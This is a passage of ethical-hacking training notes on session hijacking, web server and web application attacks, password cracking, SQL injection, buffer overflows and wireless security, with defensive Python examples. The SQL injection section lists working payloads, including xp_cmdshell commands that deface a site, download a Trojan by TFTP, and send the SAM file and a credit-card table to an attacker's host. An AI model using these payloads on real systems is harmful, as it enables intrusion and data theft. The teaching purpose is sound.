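top 5 bits a minute counter, next 2 bits an MSS index, low 25 bits a keyed
hash (plus the client ISN, so the final ACK must belong to this SYN).
"""
import hashlib
import hmac

MSS_TABLE = [536, 1300, 1440, 1460]      # 2-bit index instead of a real MSS


def _mac(secret: bytes, saddr: str, daddr: str, sport: int, dport: int, t: int) -> int:
    msg = "%s|%s|%d|%d|%d" % (saddr, daddr, sport, dport, t)
    return int.from_bytes(hmac.new(secret, msg.encode(), hashlib.sha256).digest()[:4], "big")


def make_cookie(secret: bytes, saddr: str, daddr: str, sport: int, dport: int,
                client_isn: int, mss: int, now: int) -> int:
    """Server ISN for the SYN-ACK. Nothing is stored on the server."""
    t = (now // 60) & 0x1F
    m = max((i for i, v in enumerate(MSS_TABLE) if v <= mss), default=0)
    h = (_mac(secret, saddr, daddr, sport, dport, t) + client_isn) & 0x1FFFFFF
    return (t << 27) | (m << 25) | h


def check_cookie(secret: bytes, saddr: str, daddr: str, sport: int, dport: int,
                 client_isn: int, ack: int, now: int):
    """On the final ACK, recompute from ack-1; accept only cookies from the
    current or previous minute. Returns the negotiated MSS, or None."""
    cookie = (ack - 1) & 0xFFFFFFFF
    t = cookie >> 27
    m = (cookie >> 25) & 0x3
    if ((now // 60) & 0x1F) - t & 0x1F > 1:
        return None                                   # stale or forged
    expected = (_mac(secret, saddr, daddr, sport, dport, t) + client_isn) & 0x1FFFFFF
    if cookie & 0x1FFFFFF != expected:
        return None
    return MSS_TABLE[m]


def handshake(secret: bytes, saddr: str, sport: int, client_isn: int, mss: int,
              now: int, ack_delay: int = 0):
    """SYN -> SYN-ACK(cookie) -> ACK(cookie+1), with the ACK arriving
    ack_delay seconds later. A flood of SYNs that never ACK costs nothing."""
    daddr, dport = "10.0.0.80", 80
    server_isn = make_cookie(secret, saddr, daddr, sport, dport, client_isn, mss, now)
    ack = (server_isn + 1) & 0xFFFFFFFF               # the client's third packet
    return check_cookie(secret, saddr, daddr, sport, dport, client_isn, ack, now + ack_delay)
```

The price of statelessness is that TCP options the cookie cannot encode (window scaling, SACK) are lost for cookie-validated connections, which is why real stacks enable cookies only once the listen queue overflows.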
Defending against DoS and DDoS
No defence stops a large DDoS completely; the measures reduce exposure and speed recovery:
Network ingress filtering: routers drop packets whose source address does not belong to the network they arrive from, which stops spoofed floods at their source.
Rate limiting and traffic shaping: cap the bandwidth any flow or protocol may consume.
Disable unused services and keep hosts patched so that they cannot be recruited as slaves, masters or agents.
IDS signatures exist for the control traffic of TFN, Trinoo and Stacheldraht.
Host auditing: check each host for DDoS agent binaries.
Network auditing: scan the network for agents.
Tools:
Find_ddos finds DDoS agents installed on a host.
SARA is a vulnerability scanner used to find hosts that could be recruited.
RID detects TFN, Trinoo and Stacheldraht agents on the network.
Zombie Zapper sends zombies the command to go to sleep (stop flooding), using the tools' own protocols.
Session Hijacking
Session hijacking takes over an established session between two hosts. An attacker who obtains the session ID (for web sessions) or predicts the TCP sequence number can inject packets that the server accepts as the legitimate client's.
Spoofing versus hijacking
Spoofing impersonates a host to start a new connection; the attacker never sees the replies unless it also intercepts them. Hijacking takes over an existing, already authenticated connection, so the attacker inherits the victim's access.
Session hijacking steps:
1. Track the session: sniff the traffic to learn the sequence numbers.
2. Desynchronise the connection: knock the legitimate client out with RST or FIN, or break its state.
3. Inject packets with the right TCP sequence number so that the server accepts the attacker's data.
Session hijacking works because TCP trusts sequence numbers and IP addresses, with no per-packet authentication; the attacker needs only to sniff the session, or to guess the sequence numbers if the ISN is predictable.
134
TCP connections
TCP is reliable because every segment carries a sequence number and the receiver acknowledges (ACK) what it has received; session hijacking works by taking over these numbers. The three-way handshake:
1. The client sends SYN with its initial sequence number (ISN).
2. The server replies SYN-ACK, with its own ISN and an acknowledgement number of the client's ISN + 1.
3. The client sends ACK with the server's ISN + 1.
The connection ends on timeout or with the FIN or RST flag: FIN closes gracefully, each side finishing its data; RST aborts immediately.
Sequence numbers: the ISN is a 32-bit value chosen when the connection starts (the "synchronizing" in SYN refers to agreeing on it). Every byte sent advances the sender's sequence number by 1, and the ACK number is the next sequence number the receiver expects, so the acknowledgement number equals the sequence number of the last byte received plus 1. An attacker who knows the current numbers can forge a segment that the receiver accepts as the next one in the stream.
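The sequence-number bookkeeping above as an added example (not from the original text): a simplified receiver that accepts a segment only when its sequence number is exactly the one expected, then the two hijacking cases the text distinguishes, injection with sniffed numbers and a blind guess. All ISNs, payloads and addresses are constructed, and the receiver ignores windows and retransmission to keep the rule visible.

```python
"""TCP sequence numbers and why a hijacker needs them.

Added example (not from the original document). Endpoint is a deliberately
simplified receiver: exact sequence match only, no window.
"""


class Endpoint:
    def __init__(self, isn: int):
        self.snd_nxt = isn        # next byte we will send
        self.rcv_nxt = None       # next byte we expect, set by the handshake

    def accept(self, seq: int, ack: int, payload: bytes) -> bool:
        """Accept a segment only if it is the one we expect and does not
        acknowledge bytes we never sent."""
        if seq != self.rcv_nxt or ack > self.snd_nxt:
            return False
        self.rcv_nxt = (self.rcv_nxt + len(payload)) & 0xFFFFFFFF
        return True

    def send(self, payload: bytes) -> tuple:
        seg = (self.snd_nxt, self.rcv_nxt, payload)
        self.snd_nxt = (self.snd_nxt + len(payload)) & 0xFFFFFFFF
        return seg


def handshake(client_isn: int, server_isn: int):
    """SYN, SYN-ACK, ACK: each SYN consumes one sequence number."""
    c, s = Endpoint(client_isn), Endpoint(server_isn)
    s.rcv_nxt = (client_isn + 1) & 0xFFFFFFFF     # 1. SYN  seq=client_isn
    c.rcv_nxt = (server_isn + 1) & 0xFFFFFFFF     # 2. SYN-ACK seq=server_isn, ack=client_isn+1
    c.snd_nxt = (client_isn + 1) & 0xFFFFFFFF
    s.snd_nxt = (server_isn + 1) & 0xFFFFFFFF     # 3. ACK  ack=server_isn+1
    return c, s


def hijack_demo(client_isn: int = 1000, server_isn: int = 5000) -> dict:
    c, s = handshake(client_isn, server_isn)
    # Legitimate traffic the attacker can sniff on a shared segment.
    seq, ack, data = c.send(b"USER bob\r\n")
    s.accept(seq, ack, data)
    # Active hijack: the attacker has seen seq/ack and spoofs the client's
    # next segment before the client sends it.
    active = s.accept(c.snd_nxt, c.rcv_nxt, b"DELETE /\r\n")
    # The real client now sends with a sequence number the server has
    # already consumed, so it is rejected: the connection is desynchronised.
    seq, ack, data = c.send(b"PASS x\r\n")
    client_desynced = not s.accept(seq, ack, data)
    # Blind hijack: without sniffing the attacker must guess; in a 32-bit
    # space a guess succeeds with probability 2**-32 unless the ISN is
    # predictable, which old stacks made it.
    blind = s.accept(123456789, c.rcv_nxt, b"DELETE /\r\n")
    return {"active_accepted": active, "client_desynced": client_desynced,
            "blind_accepted": blind}
```

The desynchronised client keeps retransmitting and the server keeps acknowledging the attacker's bytes, producing the "ACK storm" that Hunt and Juggernaut, described below, have to manage; on the wire that storm is one of the few visible signs of a hijack.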
135
136
Session hijacking steps (summary):
1. Track the session: learn the sequence numbers.
2. Desynchronise the client: TCP RST or FIN packets knock it out of the connection, which looks like a DoS to that client.
3. Inject the attacker's packets with the predicted TCP sequence number.
137
Types of session hijacking:
TCP/IP Hijacking
The attacker sniffs a session on the LAN and injects a spoofed segment with the correct sequence number; the real client's next segment is then rejected (wrong sequence number) and the attacker owns the session.
RST Hijacking
The attacker sends a spoofed RST (reset) to the client with the correct ACK number, closing the client's side of the connection, then continues the session with the server.
Blind Hijacking
The attacker cannot see the traffic (no sniffing position, and source routing is disabled) and must guess the sequence numbers; it can inject commands but does not see the responses.
Juggernaut is a Linux sniffer that watches TCP sessions and hijacks them on demand; it can wait for a keyword, such as a password prompt, before hijacking.
Hunt sniffs, resets and hijacks TCP sessions, using ARP spoofing to redirect the victims' traffic through the attacker's MAC address.
139
Dangers of session hijacking
A hijacker inherits the authenticated session, so strong passwords and authentication do not help once the session exists; the TCP/IP design itself is the weakness. The attacker needs only to sniff the ISN and sequence numbers, or to predict them.
Countermeasures
Encrypt the session (IPSec, SSH, SSL), so that injected data cannot be forged and the content cannot be read.
Use unpredictable (random) initial sequence numbers, and reject source-routed packets.
Time out idle sessions and limit remote connections to what is needed; use a VPN for remote access.
Use switched networks and monitor ARP to hinder sniffing.
Educate users to notice the symptoms (connections that drop unexpectedly).
Good administration: keep patches current, monitor the network around the clock (24x7), and review remote-access configurations.
Hacking web servers
Web servers sit in the DMZ, reachable from the Internet, so they are the most exposed hosts. Defacement replaces the site's pages with the attacker's; it is embarrassing and often the visible sign of a deeper compromise. Ways a site gets defaced:
capturing administrator credentials with a man-in-the-middle attack
brute-forcing the administrator password
DNS poisoning
compromising FTP or e-mail servers on the same host
web shares with weak permissions
telnet or SSH intrusion
URL poisoning
exploiting file-extension (script mapping) handlers
directory traversal
N-Stalker Web Application Security Scanner scans for buffer overflows, SQL injection, cross-site scripting and parameter tampering.
Metasploit framework is the standard exploit framework and includes web server exploits.
IISxploit.exe is a directory traversal exploit for IIS that uses Unicode-encoded strings to escape the web root.
cmd.asp is an ASP Trojan: a web page that runs commands on the server and acts as a backdoor.
CleanIISLog removes the entries of a given IP address from the IIS (W3SVC) logs.
Other tools: ServerMask (hides the server's identity), SAINT Vulnerability Scanner, CORE IMPACT, Neosploit, MPack, LinkDeny, HTTPZip, CacheRight, ServerMask ip100.
146
Patch management
A hotfix fixes one problem; a service pack collects many. Patches must be tested before deployment and tracked afterwards; an unpatched web server is the most common way in. Microsoft, St. Bernard (UpdateExpert) and PatchLink provide patch management; HFNetChk and Qfecheck list the hotfixes installed on a host.
Vulnerability scanning:
Sources: www.securityseers.com
Scanners: Nessus Security Scanner, Snort, Nmap.
: XVScan SANE .Parallel Port
Whisker is a CGI vulnerability scanner for web servers.
147
Web server security tools:
N-Stealth HTTP Vulnerability Scanner
WebInspect
Shadow Security Scanner
SecureIIS
ServersCheck Monitoring
GFI Network Server Monitor
Servers Alive
Webserver Stress Tool
Secunia PSI
IIS hardening checklist:
Rename the Administrator account and disable the Guest account.
Disable WebDAV if it is not used.
Disable directory browsing.
Apply patches and hotfixes; check with MBSA.
Enable logging and auditing, and review the IIS logs.
Script mapping: remove the handlers for unused extensions.
ISAPI filters: remove those not needed.
Set NTFS permissions on the web root and on the IIS metabase.
Shares: remove those not needed.
Allow only ports 80 and 443 through the firewall.
Restrict HTTP methods to GET and POST.
Hacking web applications
A web application exposes the database and business logic through a browser; it is reachable by anyone, and its input handling is the attack surface. The attacker studies the site (including Google hacking for exposed files), maps its pages and parameters, and then attacks how input is processed.
Cross-site scripting
Cross-site scripting (XSS) occurs when the application reflects user input into its pages without encoding it, so script supplied by the attacker runs in other users' browsers in the context of the site, stealing cookies and sessions. Example: the XSECURITY site reads the name parameter into the page:
www.xsecurity.com/default.asp?name=<script>evilScript()</script>
The page returns the name unchanged, the browser parses <script>evilScript()</script> as HTML and runs evilScript() as if it came from XSECURITY. A victim who follows such a link sends the attacker his session cookie.
Countermeasure: validate input and encode output; an XSS filter on the server rejects or escapes script tags.
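An added example (not from the original text) showing the vulnerable page beside the fixed one. The page renderer and the xsecurity.com URL are stand-ins for the ASP page the text describes; the payload is the one from the text. Nothing is served: both versions are plain functions, so the difference is visible in the returned HTML.

```python
"""Reflected XSS: the vulnerable template beside the escaped one.

Added example (not from the original document). executes_script is a crude
stand-in for the browser.
"""
import html
import re
from urllib.parse import parse_qs, urlsplit


def render_unsafe(name: str) -> str:
    """default.asp as described: the name parameter is pasted into the page."""
    return "<html><body><p>Welcome to XSECURITY, %s</p></body></html>" % name


def render_safe(name: str) -> str:
    """Same page with output encoding: <, >, &, quotes become entities, so the
    browser shows the payload as text instead of executing it."""
    return "<html><body><p>Welcome to XSECURITY, %s</p></body></html>" % html.escape(name, quote=True)


def name_from_url(url: str) -> str:
    return parse_qs(urlsplit(url).query).get("name", [""])[0]


_SCRIPT = re.compile(r"<script\b[^>]*>.*?</script\s*>", re.I | re.S)


def executes_script(page: str) -> bool:
    """Does the response contain a live <script> element? Real detection must
    also consider event handlers, javascript: URLs and attribute contexts."""
    return _SCRIPT.search(page) is not None


ATTACK_URL = "http://www.xsecurity.com/default.asp?name=<script>evilScript()</script>"
```

Escaping must match the context the value lands in: html.escape is right for element text and quoted attributes, but a value inserted into a JavaScript block or a URL needs JavaScript or URL encoding instead, and a value inserted into an unquoted attribute cannot be made safe by escaping at all.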
153
Session management: time out idle sessions, tie the session to the client IP address, and provide a logout that invalidates the session.
Buffer overflow: affects web applications and servers written in C; managed platforms (Java/J2EE) are not affected. StackGuard and StackShield protect compiled code against stack overwrites.
Authentication hijacking: stealing or guessing credentials; use SSL for the login exchange.
Other web application attacks: cookie poisoning, cryptographic interception, parameter/form tampering, platform exploits, obfuscation, application error message interception, log tampering, snooping, zero-day attacks, web services attacks, security management exploits, DMZ protocol attacks, network access attacks, TCP fragmentation.
154
Instant Source is an Internet Explorer toolbar that shows the HTML source of the current page and its elements.
Wget downloads whole sites from the command line for offline study.
WSDigger tests web services for SQL injection and cross-site scripting.
dotDefender is a web application firewall that blocks path traversal, header tampering, cross-site scripting, proxy takeover, SQL injection and probes.
Burp is an intercepting proxy that lets the tester modify requests and responses, a man-in-the-middle between browser and server.
WebSleuth spiders a site and analyses its pages and forms.
WebWatchBot monitors hosts and services: IP ping, ports, FTP, POP3, SMTP, HTTPS, HTTP and DNS.
BlackWidow scans and downloads a site's structure.
Other tools: Paros proxy, WebScarab, Watchfire AppScan, Ratproxy, Mapper, AccessDriver, Falcove, NetBrute, Emsa Web Monitor, KeepNI, Acunetix Web Vulnerability Scanner.
Google Hacking
Google hacking uses search operators to find exposed files and pages; http://johnny.ihackstuff.com maintains the database of such queries, and Acunetix Web Vulnerability Scanner automates them. Typical finds are password files, medical records, configuration files and error pages that reveal the server's internals; the site owner should run the same queries against his own domain.
156
Web authentication
HTTP basic authentication sends the user name and password base64-encoded, which is effectively clear text. Digest authentication is challenge-response: the server sends a nonce and the client returns a hash of the credentials and the nonce, so the password never crosses the wire and a captured response cannot be reused. Forms-based authentication sends the credentials in the request body and must run over SSL. Certificate-based authentication and tokens with a PIN (two-factor) are stronger than anything based on a password alone.
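As an added example (not from the original text), Basic versus Digest as the paragraph contrasts them: what a sniffer recovers from a Basic header, and the RFC 2617 Digest computation (qop="auth") with a server that keeps only HA1 and one-time nonces. Credentials, realm and nonces are constructed, except for the RFC 2617 worked example used to check the computation.

```python
"""HTTP Basic versus Digest authentication.

Added example (not from the original document). Basic is a reversible
encoding; Digest sends a hash bound to a server nonce.
"""
import base64
import hashlib
import os


def _md5(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def basic_header(user: str, password: str) -> str:
    return "Basic " + base64.b64encode(("%s:%s" % (user, password)).encode()).decode()


def basic_sniff(header: str) -> tuple:
    """What a passive listener learns from a Basic header: everything."""
    user, pw = base64.b64decode(header.split(" ", 1)[1]).decode().split(":", 1)
    return user, pw


def digest_response(user, password, realm, method, uri, nonce, nc, cnonce, qop="auth") -> str:
    """RFC 2617: response = MD5(HA1:nonce:nc:cnonce:qop:HA2)."""
    ha1 = _md5("%s:%s:%s" % (user, realm, password))
    ha2 = _md5("%s:%s" % (method, uri))
    return _md5("%s:%s:%s:%s:%s:%s" % (ha1, nonce, nc, cnonce, qop, ha2))


class DigestServer:
    """Stores HA1 per user (never the password), issues nonces, verifies."""

    def __init__(self, realm: str):
        self.realm = realm
        self.ha1 = {}
        self.nonces = set()

    def add_user(self, user: str, password: str):
        self.ha1[user] = _md5("%s:%s:%s" % (user, self.realm, password))

    def challenge(self) -> str:
        nonce = os.urandom(8).hex()
        self.nonces.add(nonce)
        return nonce

    def verify(self, user, method, uri, nonce, nc, cnonce, response) -> bool:
        if nonce not in self.nonces or user not in self.ha1:
            return False
        ha2 = _md5("%s:%s" % (method, uri))
        expected = _md5("%s:%s:%s:%s:auth:%s" % (self.ha1[user], nonce, nc, cnonce, ha2))
        if response != expected:
            return False
        self.nonces.discard(nonce)         # one-time nonce: a replayed capture fails
        return True
```

Digest protects the password on the wire, not the content: the request and response still travel in clear, and a captured HA1 is itself enough to authenticate, so the server's credential store needs the same protection as a password file.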
159
Password cracking on the web
Users pick guessable passwords, and shoulder surfing reveals them outright. Common patterns: a product name plus a digit (microsoft1), a doubled abbreviation (msoftmsoft), a word reversed (tfosorcim), keyboard sequences (qwerty, asdf), and character substitutions such as e for 3 and o for 0 (z3ro10v3, with L as 3, i as 1, o as 0). Windows 9x stored passwords in .pwl files that are trivially cracked; Kerberos is the domain authentication today.
Weak example passwords:
"james8" (a name plus a digit)
"samatha" (a name)
"superstitious" (a dictionary word)
"sUperStiTIous" (a word with case changes)
"obiwan" (popular culture)
"spicer" (a name)
"qwertyuiop" (a keyboard row)
Dictionary and brute-force tools recover all of these in minutes.
.
With the password in hand the attacker logs in, installs a backdoor and sniffs for further credentials. A dictionary attack against the login form is the direct route; an offline attack against the hashes from the SAM is quieter. Brute force tries every combination and is the last resort.
Attack types:
Dictionary: tries the words of a word list.
Brute force: tries every combination of the character set.
Hybrid: tries dictionary words with digits and symbols added or substituted.
Cain & Abel runs dictionary and brute-force attacks against captured hashes and collects them by ARP poisoning.
L0phtCrack (LC4) cracks Windows passwords.
John the Ripper cracks Unix and Windows hashes.
Gammaprog brute-forces POP3 mailbox passwords.
MessenPass recovers the stored passwords of Yahoo Messenger, MSN Messenger and Google Talk.
Password Spectator reveals the passwords hidden behind asterisks in dialog boxes.
WebCracker brute-forces HTTP basic authentication; it judges success by the server answering with a "302 Object Moved" redirect instead of a 401.
163
SQL injection and buffer overflow
Both are input attacks: SQL injection inserts SQL through input boxes or URL parameters; a buffer overflow sends more data than a field can hold. Both rely on input the application does not validate (anything invalid is passed on), and both can end in a shell on the server.
SQL Injection
In SQL injection the attacker's input becomes part of the query the application sends to the SQL server. With SQL Server's xp_cmdshell the attacker runs cmd commands on the database host, reads and changes data, and takes over the server.
Finding injectable input
1. Look at every form and parameter. A form with method=POST (a "I forgot my password" form, for example) sends its fields in the request body; GET sends them in the URL. Hidden fields are still input:
<Form action=search.asp method=post>
<input type=hidden name=X value=Z>
</Form>
2. Any page that takes a parameter (ASP, JSP, PHP, CGI) is a candidate:
http://www.xsecurity.com/index.asp?id=10
Inject by replacing the value:
http://www.xsecurity.com/index.asp?id=blah' or 1=1
3. Watch the response: a database error, different content or extra rows means the input reached the query. SELECT and INSERT statements can then be injected.
167
SQL Server injection
The single quote (') ends the string literal in the query; whatever follows is executed as SQL. Login bypass:
Login: blah' or 1=1
Password: blah' or 1=1
http://search/index.asp?id=blah' or 1=1
Other injection strings:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a
The rest of the query is commented out with --, so the condition 1=1 makes the WHERE clause true for every row.
If the application connects to SQL Server as an account that may run extended stored procedures, xp_cmdshell executes operating-system commands:
Directory listing to a file:
Blah';exec master..xp_cmdshell "dir c:\*.* /s > c:\directory.txt"--
Create a file:
Blah';exec master..xp_cmdshell "echo hacker-was-here > c:\hacker.txt"--
Ping an IP address:
Blah';exec master..xp_cmdshell "ping 192.168.1.1"--
Deface the site (write the home page):
Blah';exec master..xp_cmdshell "echo you-are-defaced > c:\inetpub\wwwroot\index.htm"--
Run a program:
Blah';exec master..xp_cmdshell "cmd.exe /c appname.exe"--
Fetch a Trojan by TFTP:
Blah';exec master..xp_cmdshell "tftp -i 10.0.0.4 GET Trojan.exe C:\trojan.exe"--
Send the SAM backup out by TFTP:
Blah';exec master..xp_cmdshell "tftp -i 10.0.0.4 put C:\winnt\repair\SAM SAM"--
sp_makewebtask writes a query result to an HTML file, here a credit card table onto a share the attacker controls:
Blah';EXEC master..sp_makewebtask "\\10.10.1.4\share\creditcard.html", "SELECT * FROM CREDITCARD"
SQL injection tools: SQLPoke, Database Scanner, AppDetective, SQL2.exe, SQLSmack, SQLbf, SqlExec, SQLDict, SQLPing v2.2, NGSSQuirreL, NGSSQLCrack.
169
SQL injection countermeasures
Validate input against a strict syntax (allowed characters and length) and reject the rest; the single quote in particular must never reach the query unescaped. Use parameterised queries or stored procedures through the database API (JDBC, ADO) instead of building SQL from strings. Run the application with a low-privileged database account, never sa or an administrator, and without access to xp_cmdshell. Do not return database errors to the browser. Keep the SQL server patched and off the Internet-facing network.
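The login bypass above against a real database, and the fix, as an added example (not from the original text). The table, users and the blah' or 1=1-- input are constructed; SQLite stands in for the SQL Server the text targets (xp_cmdshell has no SQLite counterpart, so only the authentication bypass is shown). The vulnerable function pastes user input into the query text; the fixed one passes it as a bound parameter.

```python
"""SQL injection login bypass and its fix, on SQLite.

Added example (not from the original document). Users and table are
constructed.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login TEXT, password TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [("sa", "Str0ngP@ss", "admin"), ("alice", "letmein", "user")])
    return db


def login_vulnerable(db, login: str, password: str):
    """Returns the matched (login, role) or None. String concatenation means
    the input is parsed as SQL."""
    sql = "SELECT login, role FROM users WHERE login='%s' AND password='%s'" % (login, password)
    try:
        return db.execute(sql).fetchone()
    except sqlite3.Error as e:
        return ("error", str(e))     # verbose errors are what attackers probe with


def login_fixed(db, login: str, password: str):
    """Parameterised query: the driver sends the input as data, never as SQL."""
    sql = "SELECT login, role FROM users WHERE login=? AND password=?"
    return db.execute(sql, (login, password)).fetchone()


def looks_injected(value: str) -> bool:
    """Input-validation layer the text recommends alongside parameters:
    flag the quote and comment tokens used by the payloads listed above.
    Defence in depth only; it is not a substitute for parameterised queries."""
    return any(tok in value for tok in ("'", '"', "--", ";", "/*"))


PAYLOAD = "blah' or 1=1--"
```

Note that the vulnerable query returns the first row that satisfies the always-true condition, which is why these attacks so often land on the administrative account: it tends to be the first row inserted.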
171
Buffer Overflow
A buffer overflow writes more data into a buffer than was allocated for it, so the excess overwrites adjacent memory. Like SQL injection it starts from unvalidated input, and it usually ends in a shell running with the program's privileges. On 32-bit systems, including Windows NT, the overwritten memory can include the saved return address on the stack.
Stack: a LIFO (last in, first out) area holding local variables, function arguments and return addresses; it is released automatically when the function returns.
Heap: dynamically allocated memory (malloc) that the program releases explicitly.
Buffer overflows occur in either region. How a stack overflow works:
1. The program copies input into a fixed-size buffer on the stack without checking its length.
2. The input is longer than the buffer, so it overwrites the saved frame pointer and the return address next to it.
3. When the function returns, execution jumps to the address the attacker wrote, which points into the attacker's own data (the shellcode).
Types of buffer overflow
Stack-based: the overwritten value is the saved return address (EIP), so control transfers to the attacker's code when the function returns.
Heap-based: overwrites heap management data or function pointers; harder to exploit, and not covered by stack protections.
Finding overflows: feed long strings to every input and watch for a crash (a segmentation fault); the offset at which the crash occurs tells where the return address is overwritten.
Exploiting: the payload is padding, the new return address, and the shellcode. Because the exact address is uncertain, the shellcode is preceded by a NOP sled: a run of no-operation instructions (0x90) that the CPU slides through until it reaches the shellcode, so any landing address inside the sled works. IDS signatures look for long runs of NOPs; attackers substitute other harmless single-byte instructions (x++, x--: inc and dec on a register) that behave like NOPs but do not match the signature.
Dangerous C/C++ functions: strcpy(), strcat(), streadd() and the other unbounded copies; use bounded versions and check lengths.
Countermeasures: validate input length, avoid the unsafe functions, compile with stack protection (StackGuard, StackShield), and apply vendor patches. Code produced by rapid application development (RAD) tools in particular needs review, since it is often shipped without security testing.
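An added example (not from the original text) of the detection side of the NOP-sled discussion above: a scanner that treats a long run of 0x90 or of the inc/dec "x++ / x--" single-byte x86 opcodes as a sled, so that the polymorphic variant does not slip past a 0x90-only signature. The payload byte strings are constructed samples, not a real exploit.

```python
"""Spot NOP sleds, including the inc/dec variant the text mentions.

Added example (not from the original document). An IDS signature for
repeated 0x90 bytes is evaded with other single-byte x86 instructions that
change nothing the shellcode cares about; this scanner treats any long run
drawn from that set as a sled.
"""
# 32-bit x86 single-byte opcodes usable as filler: nop (0x90) and inc/dec on
# the general registers (0x40-0x4F), i.e. the "x++ / x--" sled.
NOP_EQUIVALENTS = frozenset({0x90} | set(range(0x40, 0x50)))


def longest_sled(data: bytes, alphabet=NOP_EQUIVALENTS) -> tuple:
    """Return (offset, length) of the longest run of sled-equivalent bytes."""
    best = (0, 0)
    start = run = 0
    for i, b in enumerate(data):
        if b in alphabet:
            if run == 0:
                start = i
            run += 1
            if run > best[1]:
                best = (start, run)
        else:
            run = 0
    return best


def classify(data: bytes, threshold: int = 32) -> str:
    off, ln = longest_sled(data)
    if ln < threshold:
        return "clean"
    pure = all(b == 0x90 for b in data[off:off + ln])
    return "classic 0x90 sled" if pure else "polymorphic inc/dec sled"


# Constructed samples: a 0x90 sled, an inc/dec sled, and ordinary text.
CLASSIC = b"\x90" * 64 + b"\xcc" * 8
POLY = bytes([0x40, 0x48, 0x41, 0x49, 0x42, 0x4a, 0x90, 0x43] * 8) + b"\xcc" * 8
TEXT = b"GET /index.html HTTP/1.0\r\n" * 4
```

The inc/dec range overlaps the ASCII letters @ and A through O, so a run of upper-case text can look like a sled; the threshold and the protocol context (binary data where text is expected) are what keep the false-positive rate down, and attackers in turn pick multi-byte filler that no single-byte alphabet catches.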
Wireless networks
A wireless network broadcasts over the air, so anyone in range can receive the traffic; the physical security of the cable no longer applies. WLANs follow IEEE 802.11 and its amendments (802.11a, b, g, n). 802.11i defines the security architecture that the Wi-Fi Alliance's WPA and WPA2 implement, while the IEEE maintains the 802.11 standards themselves.
802.11: the original standard; DSSS, FHSS or infrared physical layers at 1 to 2 Mbps.
802.11a: 54 Mbps in the 5 GHz band.
802.11b: 11 Mbps at 2.4 GHz; the first widely deployed "Wi-Fi".
802.11g: 54 Mbps at 2.4 GHz, backward compatible with 802.11b.
802.11i: the security amendment (WPA2).
802.16: WiMAX, metropolitan-area wireless.
Bluetooth: short-range personal-area networking at 2.4 GHz.
900 MHz: older proprietary wireless equipment.
179
Wireless terminology:
Antenna: omni-directional (all directions) or directional.
Access Point: the bridge between the wireless and the wired network.
SSID: the network name. It is broadcast in beacons by default and sent in clear in association requests, so hiding it is not a security measure.
An access point authenticates clients with either open system (no check) or shared key (a WEP challenge).
WEP and WPA
WEP (Wired Equivalent Privacy) was meant to give wireless the privacy of a cable; it encrypts frames with RC4. WEP keys are 64 or 128 bits, of which 24 bits are the initialization vector (IV) sent in clear with every frame, leaving a 40- or 104-bit secret. Weaknesses: the IV space is small, so IVs repeat and the RC4 keystream is reused; the key is static and shared by every station; and the FMS (Fluhrer, Mantin and Shamir) attack recovers the key from enough frames with weak IVs. WEPCrack, AirSnort and aircrack implement FMS and its successors; brute force against 40-bit keys is also feasible.
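An added example (not from the original text) of the keystream-reuse weakness described above, with a minimal RC4 and a WEP-style per-packet key. The key, IVs and frame contents are constructed. Two frames encrypted under the same IV share a keystream, so XORing the ciphertexts XORs the plaintexts, and one known plaintext (an ARP reply, say) recovers the other frame. The FMS attack the text names goes further and recovers the key itself from weak IVs; that is not implemented here.

```python
"""Why 24-bit WEP IVs break RC4: keystream reuse.

Added example (not from the original document). Minimal RC4 plus a WEP-style
per-packet key of IV || secret key.
"""


def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):                       # key scheduling (KSA)
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for b in data:                             # keystream generation (PRGA)
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(secret: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: the 3-byte IV in clear, then RC4(IV||key, plaintext)."""
    assert len(iv) == 3
    return iv + rc4(iv + secret, plaintext)


def wep_decrypt(secret: bytes, frame: bytes) -> bytes:
    return rc4(frame[:3] + secret, frame[3:])


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def recover_with_known_plaintext(frame1: bytes, frame2: bytes, known_p1: bytes) -> bytes:
    """Same IV on both frames: c1 ^ c2 = p1 ^ p2, so p2 = c1 ^ c2 ^ p1.
    Raises if the IVs differ, since the attack then does not apply."""
    if frame1[:3] != frame2[:3]:
        raise ValueError("different IVs: no keystream reuse")
    n = min(len(frame1), len(frame2)) - 3
    return xor(xor(frame1[3:3 + n], frame2[3:3 + n]), known_p1[:n])


def iv_space_exhausted_after(frames_per_second: int) -> float:
    """Seconds until a busy access point must repeat one of the 2**24 IVs."""
    return (1 << 24) / frames_per_second
```

At a few thousand frames per second the IV space wraps in under an hour, and many cards started the IV at zero on every reset, so collisions came far sooner than the 2^24 figure suggests; WPA's TKIP fixed this with a per-packet key mixing and a 48-bit sequence counter, and WPA2 replaced RC4 with AES.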
Standard               Encryption                            Authentication
IEEE 802.11 (WEP)      WEP (RC4, 24-bit IV, static key)      open system or shared key; 802.1x/EAP with RADIUS for dynamic WEP keys
WPA                    TKIP                                  802.1x/EAP with RADIUS (or a pre-shared key)
WPA2 (IEEE 802.11i)    AES                                   802.1x/EAP with RADIUS (or a pre-shared key)
WarWalking: searching for wireless networks on foot.
Wardriving: the same from a car.
WarFlying: the same from an aircraft.
WarChalking: marking the networks found with chalk symbols on walls and pavements.
Blue Jacking: sending unsolicited messages to nearby Bluetooth devices.
GPS: used with the scanners to map the locations of access points.
182
Aircrack recovers WEP keys from captured frames, and WPA pre-shared keys from captured handshakes; it needs a large capture of frames (IVs) for WEP.
WEPCrack and AirSnort are earlier FMS-based WEP crackers.
NetStumbler (Windows) and Kismet (Linux) find networks and report SSID, channel, MAC address and signal strength. Kismet is passive, also finds hidden SSIDs, and includes a wireless IDS.
WEPdecrypt runs a dictionary attack against WEP and includes a key generator.
CowPatty brute-forces WPA-PSK from a captured handshake.
Changing the MAC address in Windows XP: in the registry, open
